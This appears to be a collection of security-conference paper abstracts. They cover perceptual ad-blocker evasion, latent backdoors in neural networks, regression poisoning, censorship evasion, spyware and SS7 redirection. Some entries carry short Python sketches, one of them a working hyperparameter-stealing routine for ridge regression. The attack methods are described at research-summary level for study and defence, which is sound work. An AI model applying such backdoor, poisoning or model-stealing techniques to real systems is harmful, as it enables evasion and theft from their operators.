Perceptual ad-blocking is a novel approach that detects online advertisements based on their visual content. Compared to traditional filter lists, the use of perceptual signals is believed to be less prone to an arms race with web publishers and ad networks. We demonstrate that this may not be the case. We describe attacks on multiple perceptual ad-blocking techniques, and unveil a new arms race that likely disfavors ad-blockers. Unexpectedly, perceptual ad-blocking can also introduce new vulnerabilities that let an attacker bypass web security boundaries and mount DDoS attacks. We first analyze the design space of perceptual ad-blockers and present a unified architecture that incorporates prior academic and commercial work. We then explore a variety of attacks on the ad-blocker’s detection pipeline, that enable publishers or ad networks to evade or detect ad-blocking, and at times even abuse its high privilege level to bypass web security boundaries. On one hand, we show that perceptual ad-blocking must visually classify rendered web content to escape an arms race centered on obfuscation of page markup. On the other, we present a concrete set of attacks on visual ad-blockers by constructing adversarial examples in a real web page context. For seven ad-detectors, we create perturbed ads, ad-disclosure logos, and native web content that misleads perceptual ad-blocking with 100% success rates. In one of our attacks, we demonstrate how a malicious user can upload adversarial content, such as a perturbed image in a Facebook post, that fools the ad-blocker into removing another user’s non-ad content. Moving beyond the Web and visual domain, we also build adversarial examples for AdblockRadio, an open source radio client that uses machine learning to detect ads in raw audio streams.

Attacking Graph-based Classification via Manipulating the Graph Structure

Graph-based classification methods are widely used for security analytics. Roughly speaking, graph-based classification methods include collective classification and graph neural networks. Attacking a graph-based classification method enables an attacker to evade detection in security analytics. However, existing adversarial machine learning studies mainly focused on machine learning for non-graph data. Only a few recent studies touched on adversarial graph-based classification methods; however, they focused on graph neural networks, leaving collective classification largely unexplored. We aim to bridge this gap in this work. We consider an attacker whose goal is to evade detection by manipulating the graph structure. We formulate our attack as a graph-based optimization problem, solving which produces the edges that an attacker needs to manipulate to achieve its attack goal. However, it is computationally challenging to solve the optimization problem exactly. To address the challenge, we propose several approximation techniques to solve the optimization problem. We evaluate our attacks and compare them with a recent attack designed for graph neural networks using four graph datasets. Our results show that our attacks can effectively evade graph-based classification methods. Moreover, our attacks outperform the existing attack for evading collective classification methods and some graph neural network methods.

Latent Backdoor Attacks on Deep Neural Networks

Recent work proposed the concept of backdoor attacks on deep neural networks (DNNs), where misclassification rules are hidden inside normal models, only to be triggered by very specific inputs. However, these “traditional” backdoors assume a context where users train their own models from scratch, which rarely occurs in practice. Instead, users typically customize “Teacher” models already pretrained by providers like Google, through a process called transfer learning. This customization process introduces significant changes to models and disrupts hidden backdoors, greatly reducing the actual impact of backdoors in practice. In this paper, we describe latent backdoors, a more powerful and stealthy variant of backdoor attacks that functions under transfer learning. Latent backdoors are incomplete backdoors embedded into a “Teacher” model and automatically inherited by multiple “Student” models through transfer learning. If any Student model includes the label targeted by the backdoor, its customization process completes the backdoor and makes it active. We show that latent backdoors can be quite effective in a variety of application contexts, and validate their practicality through real-world attacks against traffic sign recognition, iris identification of volunteers, and facial recognition of public figures (politicians). Finally, we evaluate 4 potential defenses, and find that only one is effective in disrupting latent backdoors, but might incur a cost in classification accuracy as a tradeoff.

Session 9E: Web Censorship and Auditing

Geneva: Evolving Censorship Evasion Strategies

Researchers and censoring regimes have long engaged in a cat-and-mouse game, leading to increasingly sophisticated Internet-scale censorship techniques and methods to evade them. In this paper, we take a drastic departure from the previously manual evade-detect cycle by developing techniques to automate the discovery of censorship evasion strategies. We present Geneva, a novel genetic algorithm that evolves packet-manipulation-based censorship evasion strategies against nation-state level censors. Geneva composes, mutates, and evolves sophisticated strategies out of four basic packet manipulation primitives (drop, tamper headers, duplicate, and fragment). With experiments performed both in-lab and against several real censors (in China, India, and Kazakhstan), we demonstrate that Geneva is able to quickly and independently re-derive most strategies from prior work, and derive novel subspecies and altogether new species of packet manipulation strategies. Moreover, Geneva discovers successful strategies that prior work posited were not effective, and evolves extinct strategies into newly working variants. We analyze the novel strategies Geneva creates to infer previously unknown behavior in censors. Geneva is a first step towards automating censorship evasion; to this end, we have made our code and data publicly available.
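The overall loop is a textbook genetic algorithm over sequences of the four packet-manipulation primitives. A toy sketch of that skeleton follows; the fitness function here is a placeholder, whereas Geneva's real fitness comes from replaying each strategy against a live censor, and its strategies also carry triggers and arguments that this sketch omits:

```python
import random

PRIMITIVES = ["drop", "tamper", "duplicate", "fragment"]

def random_strategy(max_len=4):
    return [random.choice(PRIMITIVES) for _ in range(random.randint(1, max_len))]

def mutate(strategy):
    """Randomly delete, insert, or swap one primitive."""
    s, r = strategy[:], random.random()
    if r < 0.33 and len(s) > 1:
        s.pop(random.randrange(len(s)))
    elif r < 0.66:
        s.insert(random.randrange(len(s) + 1), random.choice(PRIMITIVES))
    else:
        s[random.randrange(len(s))] = random.choice(PRIMITIVES)
    return s

def fitness(strategy):
    # Placeholder only: Geneva scores a strategy by replaying it against
    # a real censor and checking whether the connection survives.
    return strategy.count("fragment") - abs(len(strategy) - 2)

def evolve(pop_size=20, generations=30):
    pop = [random_strategy() for _ in range(pop_size)]
    for _ in range(generations):
        pop.sort(key=fitness, reverse=True)
        parents = pop[: pop_size // 2]                # elitist selection
        pop = parents + [mutate(random.choice(parents))
                         for _ in range(pop_size - len(parents))]
    return max(pop, key=fitness)

print(evolve())   # e.g. ['fragment', 'fragment']
```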

Conjure: Summoning Proxies from Unused Address Space

Refraction Networking (formerly known as “Decoy Routing”) has emerged as a promising next-generation approach for circumventing Internet censorship. Rather than trying to hide individual circumvention proxy servers from censors, proxy functionality is implemented in the core of the network, at cooperating ISPs in friendly countries. Any connection that traverses these ISPs could be a conduit for the free flow of information, so censors cannot easily block access without also blocking many legitimate sites. While one Refraction scheme, TapDance, has recently been deployed at ISP-scale, it suffers from several problems: a limited number of “decoy” sites in realistic deployments, high technical complexity, and undesirable tradeoffs between performance and observability by the censor. These challenges may impede broader deployment and ultimately allow censors to block such techniques. We present Conjure, an improved Refraction Networking approach that overcomes these limitations by leveraging unused address space at deploying ISPs. Instead of using real websites as the decoy destinations for proxy connections, our scheme connects to IP addresses where no web server exists, leveraging proxy functionality from the core of the network. These phantom hosts are difficult for a censor to distinguish from real ones, but can be used by clients as proxies. We define the Conjure protocol, analyze its security, and evaluate a prototype using an ISP testbed. Our results suggest that Conjure can be harder to block than TapDance, is simpler to maintain and deploy, and offers substantially better network performance.

You Shall Not Join: A Measurement Study of Cryptocurrency Peer-to-Peer Bootstrapping Techniques

Cryptocurrencies are digital assets which depend upon the use of distributed peer-to-peer networks. The method a new peer uses to initially join a peer-to-peer network is known as bootstrapping. The ability to bootstrap without the use of a centralized resource is an unresolved challenge. In this paper we survey the bootstrapping techniques used by 74 cryptocurrencies and find that censorship-prone methods such as DNS seeding and IP hard-coding are the most prevalent. In response to this finding, we test two other bootstrapping techniques less susceptible to censorship, Tor and ZMap, to determine if they are operationally feasible alternatives more resilient to censorship. We perform a global measurement study of DNS query responses for each of the 92 DNS seeds discovered, across 42 countries, using the distributed RIPE Atlas network. This provides details of each cryptocurrency’s peer-to-peer network topology and also highlights instances of DNS outages and query manipulation impacting the bootstrapping process. Our study also reveals that the source code of the cryptocurrencies researched comes from only five main repositories, which accounts for the inheritance of legacy bootstrapping methods. Finally, we discuss the implications of our findings and provide recommendations to mitigate the risks exposed.
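DNS seeding, the most prevalent method found, reduces bootstrapping to a single name lookup, which is precisely what makes it censorship-prone: whoever can block or rewrite that lookup controls whether a new peer can join. A minimal sketch, using one of Bitcoin's well-known DNS seeds (error handling omitted):

```python
import socket

def dns_seed_peers(seed="seed.bitcoin.sipa.be", port=8333):
    """Resolve a DNS seed into candidate peer addresses. Anyone who can
    block or poison this single lookup can block bootstrapping."""
    infos = socket.getaddrinfo(seed, port, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})

print(dns_seed_peers()[:5])   # requires network access
```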

SAMPL: Scalable Auditability of Monitoring Processes using Public Ledgers

Organized surveillance, especially by governments, poses a major challenge to individual privacy, due to the resources governments have at their disposal and the possibility of overreach. Given the impact of invasive monitoring, in most democratic countries government surveillance is, in theory, monitored and subject to public oversight to guard against violations. In practice, there is a difficult balance between safeguarding individuals’ privacy rights and not diluting the efficacy of national security investigations, as exemplified by reports on government surveillance programs that have caused public controversy and have been challenged by civil and privacy rights organizations. Surveillance is generally conducted through a mechanism where federal agencies obtain a warrant from a federal or state judge (e.g., the US FISA court, Supreme Court in Canada) to subpoena a company or service-provider (e.g., Google, Microsoft) for their customers’ data. The courts provide annual statistics on the requests (accepted, rejected), while the companies provide annual transparency reports for public auditing. However, in practice, the statistical information provided by the courts and companies is very high-level, generic, released after the fact, and inadequate for auditing the operations. Often this is attributed to the lack of scalable mechanisms for reporting and transparent auditing. In this paper, we present SAMPL, a novel auditing framework which leverages cryptographic mechanisms, such as zero-knowledge proofs, Pedersen commitments, Merkle trees, and public ledgers, to create a scalable mechanism for auditing electronic surveillance processes involving multiple actors. SAMPL is the first framework that can identify the actors (e.g., agencies and companies) that violate the purview of court orders. We experimentally demonstrate the scalability of SAMPL in handling concurrent monitoring processes without undermining their secrecy and auditability.
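Of the listed building blocks, the Merkle tree is what makes auditing scale: the public ledger stores only a small root, yet inclusion of any individual record can be proven and checked in logarithmic time. A self-contained sketch of that piece alone (SAMPL's commitments and zero-knowledge proofs are omitted):

```python
import hashlib

def h(b: bytes) -> bytes:
    return hashlib.sha256(b).digest()

def merkle_root(leaves):
    level = [h(x) for x in leaves]
    while len(level) > 1:
        if len(level) % 2:
            level.append(level[-1])                   # pad odd levels
        level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
    return level[0]

def merkle_proof(leaves, index):
    """Sibling hashes from leaf to root, plus 'is our node on the left'."""
    level, proof = [h(x) for x in leaves], []
    while len(level) > 1:
        if len(level) % 2:
            level.append(level[-1])
        proof.append((level[index ^ 1], index % 2 == 0))
        level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
        index //= 2
    return proof

def verify(leaf, proof, root):
    node = h(leaf)
    for sibling, node_is_left in proof:
        node = h(node + sibling) if node_is_left else h(sibling + node)
    return node == root

records = [b"order-1", b"order-2", b"order-3", b"order-4"]
root = merkle_root(records)
print(verify(records[2], merkle_proof(records, 2), root))   # True
```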

S&P

2018 program dblp

Machine Learning

AI2: Safety and Robustness Certification of Neural Networks with Abstract Interpretation

We present AI2, the first sound and scalable analyzer for deep neural networks. Based on overapproximation, AI2 can automatically prove safety properties (e.g., robustness) of realistic neural networks (e.g., convolutional neural networks).

The key insight behind AI2 is to phrase reasoning about safety and robustness of neural networks in terms of classic abstract interpretation, enabling us to leverage decades of advances in that area. Concretely, we introduce abstract transformers that capture the behavior of fully connected and convolutional neural network layers with rectified linear unit activations (ReLU), as well as max pooling layers. This allows us to handle real-world neural networks, which are often built out of those types of layers.

We present a complete implementation of AI2 together with an extensive evaluation on 20 neural networks. Our results demonstrate that: (i) AI2 is precise enough to prove useful specifications (e.g., robustness), (ii) AI2 can be used to certify the effectiveness of state-of-the-art defenses for neural networks, (iii) AI2 is significantly faster than existing analyzers based on symbolic analysis, which often take hours to verify simple fully connected networks, and (iv) AI2 can handle deep convolutional networks, which are beyond the reach of existing methods.
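AI2's domains are zonotopes and polyhedra, but the core idea is easiest to see in the coarser interval (box) domain: push a box through abstract versions of each layer and check that the target class dominates every other one at the output. A sketch under that simplification (not the paper's implementation; the tiny network below is invented):

```python
import numpy as np

def affine_box(lo, hi, W, b):
    """Propagate an interval [lo, hi] through x -> Wx + b exactly."""
    Wp, Wn = np.maximum(W, 0), np.minimum(W, 0)
    return Wp @ lo + Wn @ hi + b, Wp @ hi + Wn @ lo + b

def relu_box(lo, hi):
    return np.maximum(lo, 0), np.maximum(hi, 0)

def certify(x, eps, layers, c):
    """Prove every point in the L-infinity ball B(x, eps) keeps class c."""
    lo, hi = x - eps, x + eps
    for (W, b) in layers[:-1]:
        lo, hi = relu_box(*affine_box(lo, hi, W, b))
    lo, hi = affine_box(lo, hi, *layers[-1])
    # Robust if class c's lower bound beats every other class's upper bound
    return all(lo[c] > hi[j] for j in range(len(lo)) if j != c)

W1, b1 = np.array([[1.0, -1.0], [0.5, 2.0]]), np.zeros(2)
W2, b2 = np.eye(2), np.zeros(2)
x = np.array([1.0, 0.2])
print(certify(x, 0.01, [(W1, b1), (W2, b2)], c=1))   # True: certified
```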

Manipulating Machine Learning: Poisoning Attacks and Countermeasures for Regression Learning

As machine learning becomes widely used for automated decisions, attackers have strong incentives to manipulate the results and models generated by machine learning algorithms. In this paper, we perform the first systematic study of poisoning attacks and their countermeasures for linear regression models. In poisoning attacks, attackers deliberately influence the training data to manipulate the results of a predictive model. We propose a theoretically-grounded optimization framework specifically designed for linear regression and demonstrate its effectiveness on a range of datasets and models. We also introduce a fast statistical attack that requires limited knowledge of the training process. Finally, we design a new principled defense method that is highly resilient against all poisoning attacks. We provide formal guarantees about its convergence and an upper bound on the effect of poisoning attacks when the defense is deployed. We extensively evaluate our attacks and defenses on three realistic datasets from the health care, loan assessment, and real estate domains.

Stealing Hyperparameters in Machine Learning

Hyperparameters are critical in machine learning, as different hyperparameters often result in models with significantly different performance. Hyperparameters may be deemed confidential because of their commercial value and the confidentiality of the proprietary algorithms that the learner uses to learn them. In this work, we propose attacks on stealing the hyperparameters that are learned by a learner. We call our attacks hyperparameter stealing attacks. Our attacks are applicable to a variety of popular machine learning algorithms such as ridge regression, logistic regression, support vector machine, and neural network. We evaluate the effectiveness of our attacks both theoretically and empirically. For instance, we evaluate our attacks on Amazon Machine Learning. Our results demonstrate that our attacks can accurately steal hyperparameters. We also study countermeasures. Our results highlight the need for new defenses against our hyperparameter stealing attacks for certain machine learning algorithms.
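For learners with differentiable objectives the attack has a clean closed form: the learned parameters satisfy a zero-gradient condition that is linear in the hyperparameter, so the attacker can solve for it. A sketch for ridge regression, one of the paper's cases (the data and lambda below are synthetic):

```python
import numpy as np

def steal_ridge_lambda(X, y, w):
    """Recover lambda from training data (X, y) and learned weights w,
    assuming w minimizes ||Xw - y||^2 + lam * ||w||^2.
    At the optimum: X^T(Xw - y) + lam * w = 0, linear in lam."""
    g = X.T @ (X @ w - y)              # gradient of the loss term
    return float(-(w @ g) / (w @ w))   # least-squares solution for lam

# Sanity check: train with a known lambda, then recover it.
rng = np.random.default_rng(0)
X = rng.normal(size=(100, 5))
y = X @ rng.normal(size=5) + 0.1 * rng.normal(size=100)
lam = 3.7
w = np.linalg.solve(X.T @ X + lam * np.eye(5), X.T @ y)
print(steal_ridge_lambda(X, y, w))     # ~3.7
```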

A Machine Learning Approach To Prevent Malicious Calls Over Telephony Networks

Malicious calls, i.e., telephony spams and scams, have been a long-standing challenging issue that causes billions of dollars of annual financial loss worldwide. This work presents the first machine learning-based solution that does not rely on any particular assumptions about the underlying telephony network infrastructure.

The main challenge of this decade-long problem is that it is unclear how to construct effective features without access to the telephony networks’ infrastructure. We solve this problem by combining several innovations. We first develop a TouchPal user interface on top of a mobile app to allow users to tag malicious calls. This allows us to maintain a large-scale call log database. We then conduct a measurement study over three months of call logs, including 9 billion records. We design 29 features based on the results, so that machine learning algorithms can be used to predict malicious calls. We extensively evaluate different state-of-the-art machine learning approaches using the proposed features, and the results show that the best approach can reduce unblocked malicious calls by up to 90% while maintaining a precision over 99.99% on the benign call traffic. The results also show the models are efficient to implement without incurring significant latency overhead. We also conduct an ablation analysis, which reveals that using 10 of the 29 features reaches performance comparable to using all features.

Surveylance: Automatically Detecting Online Survey Scams

Online surveys are a popular mechanism for performing market research in exchange for monetary compensation. Unfortunately, fraudulent survey websites are similarly rising in popularity among cyber-criminals as a means for executing social engineering attacks. In addition to the sizable population of users that participate in online surveys as a secondary revenue stream, unsuspecting users who search the web for free content or access codes to commercial software can also be exposed to survey scams. This occurs through redirection to websites that ask the user to complete a survey in order to receive the promised content or a reward.

In this paper, we present SURVEYLANCE, the first system that automatically identifies survey scams using machine learning techniques. Our evaluation demonstrates that SURVEYLANCE works well in practice by identifying 8,623 unique websites involved in online survey attacks. We show that SURVEYLANCE is suitable for assisting human analysts in survey scam detection at scale. Our work also provides the first systematic analysis of the survey scam ecosystem by investigating the capabilities of these services, mapping all the parties involved in the ecosystem, and quantifying the consequences to users that are exposed to these services. Our analysis reveals that a large number of survey scams are easily reachable through the Alexa top 30K websites, and expose users to a wide range of security issues including identity fraud, deceptive advertisements, potentially unwanted programs (PUPs), malicious extensions, and malware.

Understanding Users

Hackers vs. Testers: A Comparison of Software Vulnerability Discovery Processes

Identifying security vulnerabilities in software is a critical task that requires significant human effort. Currently, vulnerability discovery is often the responsibility of software testers before release and white-hat hackers (often within bug bounty programs) afterward. This arrangement can be ad-hoc and far from ideal; for example, if testers could identify more vulnerabilities, software would be more secure at release time. Thus far, however, the processes used by each group - and how they compare to and interact with each other - have not been well studied. This paper takes a first step toward better understanding, and eventually improving, this ecosystem: we report on a semi-structured interview study (n=25) with both testers and hackers, focusing on how each group finds vulnerabilities, how they develop their skills, and the challenges they face. The results suggest that hackers and testers follow similar processes, but get different results due largely to differing experiences and therefore different underlying knowledge of security concepts. Based on these results, we provide recommendations to support improved security training for testers, better communication between hackers and developers, and smarter bug bounty policies to motivate hacker participation.

Towards Security and Privacy for Multi-User Augmented Reality: Foundations with End Users

Immersive augmented reality (AR) technologies are becoming a reality. Prior works have identified security and privacy risks raised by these technologies, primarily considering individual users or AR devices. However, we make two key observations: (1) users will not always use AR in isolation, but also in ecosystems of other users, and (2) since immersive AR devices have only recently become available, the risks of AR have been largely hypothetical to date.
To provide a foundation for understanding and addressing the security and privacy challenges of emerging AR technologies, grounded in the experiences of real users, we conduct a qualitative lab study with an immersive AR headset, the Microsoft HoloLens. We conduct our study in pairs - 22 participants across 11 pairs - wherein participants engage in paired and individual (but physically co-located) HoloLens activities. Through semi-structured interviews, we explore participants’ security, privacy, and other concerns, raising key findings. For example, we find that despite the HoloLens’s limitations, participants were easily immersed, treating virtual objects as real (e.g., stepping around them for fear of tripping). We also uncover numerous security, privacy, and safety concerns unique to AR (e.g., deceptive virtual objects misleading users about the real world), and a need for access control among users to manage shared physical spaces and virtual content embedded in those spaces. Our findings give us the opportunity to identify broader lessons and key challenges to inform the design of emerging single- and multi-user AR technologies.

Computer Security and Privacy for Refugees in the United States

In this work, we consider the computer security and privacy practices and needs of recently resettled refugees in the United States. We ask: How do refugees use and rely on technology as they settle in the US? What computer security and privacy practices do they have, and what barriers do they face that may put them at risk? And how are their computer security mental models and practices shaped by the advice they receive? We study these questions through in-depth qualitative interviews with case managers and teachers who work with refugees at a local NGO, as well as through focus groups with refugees themselves. We find that refugees must rely heavily on technology (e.g., email) as they attempt to establish their lives and find jobs; that they also rely heavily on their case managers and teachers for help with those technologies; and that these pressures can push security practices into the background or make common security “best practices” infeasible. At the same time, we identify fundamental challenges to computer security and privacy for refugees, including barriers due to limited technical expertise, language skills, and cultural knowledge - for example, we find that scams as a threat are a new concept for many of the refugees we studied, and that many common security practices (e.g., password creation techniques and security questions) rely on US cultural knowledge. From these and other findings, we distill recommendations for the computer security community to better serve the computer security and privacy needs and constraints of refugees, a potentially vulnerable population that has not been previously studied in this context.

On Enforcing the Digital Immunity of a Large Humanitarian Organization

Humanitarian action, the process of aiding individuals in situations of crises, poses unique information-security challenges due to natural or manmade disasters, the adverse environments in which it takes place, and the scale and multi-disciplinary nature of the problems. Despite these challenges, humanitarian organizations are transitioning towards a strong reliance on the digitization of collected data and digital tools, which improves their effectiveness but also exposes them to computer security threats. In this paper, we conduct a qualitative analysis of the computer-security challenges of the International Committee of the Red Cross (ICRC), a large humanitarian organization with over sixteen thousand employees, an international legal personality, which involves privileges and immunities, and over 150 years of experience with armed conflicts and other situations of violence worldwide. To investigate the computer security needs and practices of the ICRC from an operational, technical, legal, and managerial standpoint by considering individual, organizational, and governmental levels, we interviewed 27 field workers, IT staff, lawyers, and managers. Our results provide a first look at the unique security and privacy challenges that humanitarian organizations face when collecting, processing, transferring, and sharing data to enable humanitarian action for a multitude of sensitive activities. These results highlight, among other challenges, the trade-offs between operational security and requirements stemming from all stakeholders, the legal barriers to data sharing across jurisdictions, and especially the need to complement privileges and immunities with robust technological safeguards in order to avoid any leakages that might hinder access and potentially compromise the neutrality, impartiality, and independence of humanitarian action.

The Spyware Used in Intimate Partner Violence

Survivors of intimate partner violence increasingly report that abusers install spyware on devices to track their location, monitor communications, and cause emotional and physical harm. To date there has been only cursory investigation into the spyware used in such intimate partner surveillance (IPS). We provide the first in-depth study of the IPS spyware ecosystem. We design, implement, and evaluate a measurement pipeline that combines web and app store crawling with machine learning to find and label apps that are potentially dangerous in IPS contexts. Ultimately we identify several hundred such IPS-relevant apps. While we find dozens of overt spyware tools, the majority are “dual-use” apps - they have a legitimate purpose (e.g., child safety or anti-theft), but are easily and effectively repurposed for spying on a partner. We document that a wealth of online resources are available to educate abusers about exploiting apps for IPS. We also show how some dual-use app developers are encouraging their use in IPS via advertisements, blogs, and customer support services. We analyze existing anti-virus and anti-spyware tools, which universally fail to identify dual-use apps as a threat.

Networked Systems

Distance-Bounding Protocols: Verification without Time and Location

Distance-bounding protocols are cryptographic protocols that securely establish an upper bound on the physical distance between the participants. Existing symbolic verification frameworks for distance-bounding protocols consider timestamps and the location of agents. In this work we introduce a causality-based characterization of secure distance-bounding that discards the notions of time and location. This allows us to verify the correctness of distance-bounding protocols with standard protocol verification tools. That is to say, we provide the first fully automated verification framework for distance-bounding protocols. By using our framework, we confirmed known vulnerabilities in a number of protocols and discovered unreported attacks against two recently published protocols.

Sonar: Detecting SS7 Redirection Attacks With Audio-Based Distance Bounding

The global telephone network is relied upon by billions every day. Central to its operation is the Signaling System 7 (SS7) protocol, which is used for setting up calls, managing mobility, and facilitating many other network services. This protocol was originally built on the assumption that only a small number of trusted parties would be able to directly communicate with its core infrastructure. As a result, SS7 — as a feature — allows all parties with core access to redirect and intercept calls for any subscriber anywhere in the world. Unfortunately, increased interconnectivity with the SS7 network has led to a growing number of illicit call redirection attacks. We address such attacks with Sonar, a system that detects the presence of SS7 redirection attacks by securely measuring call audio round-trip times between telephony devices. This approach works because redirection attacks force calls to travel longer physical distances than usual, thereby creating longer end-to-end delay. We design and implement a distance bounding-inspired protocol that allows us to securely characterize the round-trip time between the two endpoints. We then use custom hardware deployed in 10 locations across the United States and a redirection testbed to characterize how distance affects round trip time in phone networks. We develop a model using this testbed and show Sonar is able to detect 70.9% of redirected calls between call endpoints of varying attacker proximity (300–7100 miles) with low false positive rates (0.3%). Finally, we ethically perform actual SS7 redirection attacks on our own devices with the help of an industry partner to demonstrate that Sonar detects 100% of such redirections in a real network (with no false positives). As such, we demonstrate that telephone users can reliably detect SS7 redirection attacks and protect the integrity of their calls.
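The detection signal reduces to physics: call audio cannot round-trip between two endpoints faster than propagation allows, so a redirected call exhibits an RTT inflated well beyond the geometric minimum. A back-of-the-envelope sketch; the fiber speed is a standard rule of thumb, and the slack term is an invented stand-in for Sonar's calibrated model:

```python
def min_rtt_ms(distance_miles):
    """Lower bound on audio round-trip time between two endpoints.
    Signals in fiber travel at roughly 2/3 c, about 124 miles per ms."""
    return 2 * distance_miles / 124.0

def looks_redirected(measured_rtt_ms, endpoint_distance_miles, slack_ms=80.0):
    # slack absorbs codec, switching, and routing overhead (illustrative)
    return measured_rtt_ms > min_rtt_ms(endpoint_distance_miles) + slack_ms

print(looks_redirected(250.0, 500.0))   # 250 ms for a 500-mile call -> True
```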

OmniLedger: A Secure, Scale-Out, Decentralized Ledger via Sharding

Designing a secure permissionless distributed ledger (blockchain) that performs on par with centralized payment processors, such as Visa, is a challenging task. Most existing distributed ledgers are unable to scale-out, i.e., to grow their total processing capacity with the number of validators; and those that do, compromise security or decentralization. We present OmniLedger, a novel scale-out distributed ledger that preserves long-term security under permissionless operation. It ensures security and correctness by using a bias-resistant public-randomness protocol for choosing large, statistically representative shards that process transactions, and by introducing an efficient cross-shard commit protocol that atomically handles transactions affecting multiple shards. OmniLedger also optimizes performance via parallel intra-shard transaction processing, ledger pruning via collectively-signed state blocks, and low-latency “trust-but-verify” validation for low-value transactions. An evaluation of our experimental prototype shows that OmniLedger’s throughput scales linearly in the number of active validators, supporting Visa-level workloads and beyond, while confirming typical transactions in under two seconds.

Routing Around Congestion: Defeating DDoS Attacks and Adverse Network Conditions via Reactive BGP Routing

In this paper, we present Nyx, the first system to both effectively mitigate modern Distributed Denial of Service (DDoS) attacks regardless of the amount of traffic under adversarial control and function without outside cooperation or an Internet redesign. Nyx approaches the problem of DDoS mitigation as a routing problem rather than a filtering problem. This conceptual shift allows Nyx to avoid many of the common shortcomings of existing academic and commercial DDoS mitigation systems. By leveraging how Autonomous Systems (ASes) handle route advertisement in the existing Border Gateway Protocol (BGP), Nyx allows the deploying AS to move traffic from a critical upstream AS off of attacked links and onto alternative, uncongested paths. This isolation removes the need for filtering or de-prioritizing attack traffic. Nyx controls outbound paths through normal BGP path selection, while return paths from critical ASes are controlled through specific techniques we developed using existing traffic engineering principles that require no outside coordination. Using our own realistic Internet-scale simulator, we find that in more than 98% of cases our system can successfully route critical traffic around network segments under transit-link DDoS attacks, a new form of DDoS attack in which the attack traffic never reaches the victim AS, thus invalidating defensive filtering, throttling, or prioritization strategies. More significantly, in over 95% of those cases, the alternate path provides complete congestion relief from transit-link DDoS. Nyx additionally provides complete congestion relief in over 75% of cases when the deployer is being directly attacked.

Tracking Ransomware End-to-end

Ransomware is a type of malware that encrypts the files of infected hosts and demands payment, often in a crypto-currency like Bitcoin. In this paper, we create a measurement framework that we use to perform a large-scale, two-year, end-to-end measurement of ransomware payments, victims, and operators. By combining an array of data sources, including ransomware binaries, seed ransom payments, victim telemetry from infections, and a large database of bitcoin addresses annotated with their owners, we sketch the outlines of this burgeoning ecosystem and associated third-party infrastructure. In particular, we are able to trace the financial transactions, from the acquisition of bitcoins by victims, through the payment of ransoms, to the cash out of bitcoins by the ransomware operators. We find that many ransomware operators cashed out using BTC-e, a now-defunct Bitcoin exchange. In total we are able to track over $16 million USD in likely ransom payments made by 19,750 potential victims during a two-year period. While our study focuses on ransomware, our methods are potentially applicable to other cybercriminal operations that have similarly adopted Bitcoin as their payment channel.

Program Analysis

The Rise of the Citizen Developer: Assessing the Security Impact of Online App Generators

Mobile apps are increasingly created using online application generators (OAGs) that automate app development, distribution, and maintenance. These tools significantly lower the level of technical skill that is required for app development, which makes them particularly appealing to citizen developers, i.e., developers with little or no software engineering background. However, as the pervasiveness of these tools increases, so does their overall influence on the mobile ecosystem’s security, as security lapses by such generators affect thousands of generated apps. The security of such generated apps, as well as their impact on the security of the overall app ecosystem, has not yet been investigated.

We present the first comprehensive classification of commonly used OAGs for Android and show how to fingerprint uniquely generated apps to link them back to their generator. We thereby quantify the market penetration of these OAGs based on a corpus of 2,291,898 free Android apps from Google Play and discover that at least 11.1% of these apps were created using OAGs. Using a combination of dynamic, static, and manual analysis, we find that the services’ app generation model is based on boilerplate code that is prone to reconfiguration attacks in 7 of the 13 analyzed OAGs. Moreover, we show that this boilerplate code includes well-known security issues such as code injection vulnerabilities and insecure WebViews. Given the tight coupling of generated apps with their services’ backends, we further identify security issues in their infrastructure. Due to the blackbox development approach, citizen developers are unaware of these hidden problems that ultimately put end-users’ sensitive data and privacy at risk and violate users’ trust assumptions. A particularly worrisome result of our study is that OAGs indeed have a significant amplification factor for those vulnerabilities, notably harming the health of the overall mobile app ecosystem.

Learning from Mutants: Using Code Mutation to Learn and Monitor Invariants of a Cyber-Physical System

Cyber-physical systems (CPS) consist of sensors, actuators, and controllers all communicating over a network; if any subset becomes compromised, an attacker could cause significant damage. With access to data logs and a model of the CPS, the physical effects of an attack could potentially be detected before any damage is done. Manually building a model that is accurate enough in practice, however, is extremely difficult. In this paper, we propose a novel approach for constructing models of CPS automatically, by applying supervised machine learning to data traces obtained after systematically seeding their software components with faults (“mutants”). We demonstrate the efficacy of this approach on the simulator of a real-world water purification plant, presenting a framework that automatically generates mutants, collects data traces, and learns an SVM-based model. Using cross-validation and statistical model checking, we show that the learnt model characterises an invariant physical property of the system. Furthermore, we demonstrate the usefulness of the invariant by subjecting the system to 55 network and code-modification attacks, and showing that it can detect 85% of them from the data logs generated at runtime.

Precise and Scalable Detection of Double-Fetch Bugs in OS Kernels

During system call execution, it is common for operating system kernels to read userspace memory multiple times (multi-reads). A critical bug may exist if the fetched userspace memory is subject to change across these reads, i.e., a race condition, which is known as a double-fetch bug. Prior works have attempted to detect these bugs both statically and dynamically. However, due to their improper assumptions and imprecise definitions regarding double-fetch bugs, their multi-read detection is inherently limited and suffers from significant false positives and false negatives. For example, their approach is unable to support device emulation, inter-procedural analysis, loop handling, etc. More importantly, they completely leave the task of finding real double-fetch bugs from the haystack of multi-reads to manual verification, which is expensive if possible at all.

In this paper, we first present a formal and precise definition of double-fetch bugs and then implement a static analysis system - Deadline - to automatically detect double-fetch bugs in OS kernels. Deadline uses static program analysis techniques to systematically find multi-reads throughout the kernel and employs specialized symbolic checking to vet each multi-read for double-fetch bugs. We apply Deadline to Linux and FreeBSD kernels and find 23 new bugs in Linux and one new bug in FreeBSD. We further propose four generic strategies to patch and prevent double-fetch bugs based on our study and the discussion with kernel maintainers.

CollAFL: Path Sensitive Fuzzing

Coverage-guided fuzzing is a widely used and effective solution to find software vulnerabilities. Tracking code coverage and utilizing it to guide fuzzing are crucial to coverage-guided fuzzers. However, tracking full and accurate path coverage is infeasible in practice due to the high instrumentation overhead. Popular fuzzers (e.g., AFL) often use coarse coverage information, e.g., edge hit counts stored in a compact bitmap, to achieve highly efficient greybox testing. Such inaccuracy and incompleteness in coverage introduce serious limitations to fuzzers. First, it causes path collisions, which prevent fuzzers from discovering potential paths that lead to new crashes. More importantly, it prevents fuzzers from making wise decisions on fuzzing strategies.
